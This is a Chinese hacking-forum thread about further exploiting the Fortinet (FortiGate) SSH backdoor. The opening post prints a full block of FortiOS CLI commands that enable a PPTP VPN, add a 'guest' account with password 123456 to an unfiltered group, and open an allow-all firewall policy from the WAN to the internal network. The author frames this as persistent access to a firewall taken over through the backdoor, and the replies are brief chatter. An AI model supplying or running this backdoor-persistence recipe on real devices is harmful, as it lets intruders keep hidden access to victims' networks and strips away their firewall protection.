查看: 14014|回复: 7

飞塔SSH后门 进一步利用方法

[复制链接]
发表于 2016-1-15 17:44:54 | 显示全部楼层 |阅读模式
最近这个漏洞很火啊!  


因为这个漏洞获取到的直接就是防火墙的root权限。所以我们给自己开个vpn  然后  你想干啥就干啥呗。还不懂?  去翻用户手册。

查看用户组
[AppleScript] 纯文本查看 复制代码
show user group

开启vpn代码。
[AppleScript] 纯文本查看 复制代码
config vpn pptp
set status enable
set eip 192.168.200.100
set sip 192.168.200.1
set usrgrp Guest-group
end
config user local
edit "guest"
set type password
set passwd 123456
next
end
config user group
edit "Guest-group"
set profile "unfiltered"
set member "guest"
next
end
config firewall policy
edit 9
set srcintf "wan1"
set dstintf "internal"
set srcaddr "all"
set dstaddr "all"
set action accept
set schedule "always"
set service "ANY"
next
end
回复

使用道具 举报

发表于 2016-1-15 19:27:15 | 显示全部楼层
666666     

评分

参与人数 1i币 -7 收起 理由
浮尘 -7 恶意灌水

查看全部评分

回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-1-15 23:46:46 | 显示全部楼层
LangDao 发表于 2016-1-15 19:27
666666

没意思,分享东西都没人看,以后不分享了
回复 支持 反对

使用道具 举报

发表于 2016-1-16 00:03:10 | 显示全部楼层
额  其实有人看,为了尊重劳动成果,建议还是带上VIA
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-1-16 01:16:22 | 显示全部楼层
Antergone 发表于 2016-1-16 00:03
额  其实有人看,为了尊重劳动成果,建议还是带上VIA

via   啥玩意
回复 支持 反对

使用道具 举报

 楼主| 发表于 2016-1-16 01:16:59 | 显示全部楼层
Antergone 发表于 2016-1-16 00:03
额  其实有人看,为了尊重劳动成果,建议还是带上VIA

主要是没人出来讨论

点评

其实很简单,就是通过remote连接之后,在上面执行cli命令就好了。 你在上面列出来的都是命令啊 就类似你在linux的terminal 执行 adduser addgroup一样  详情 回复 发表于 2016-1-16 11:13
回复 支持 反对

使用道具 举报

发表于 2016-1-16 07:41:36 | 显示全部楼层
看不懂
回复 支持 反对

使用道具 举报

发表于 2016-1-16 11:13:03 | 显示全部楼层
tx1 发表于 2016-1-16 01:16
主要是没人出来讨论

其实很简单,就是通过remote连接之后,在上面执行cli命令就好了。
你在上面列出来的都是命令啊     就类似你在linux的terminal 执行 adduser addgroup一样
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-2 17:39 , Processed in 0.141782 second(s), 19 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部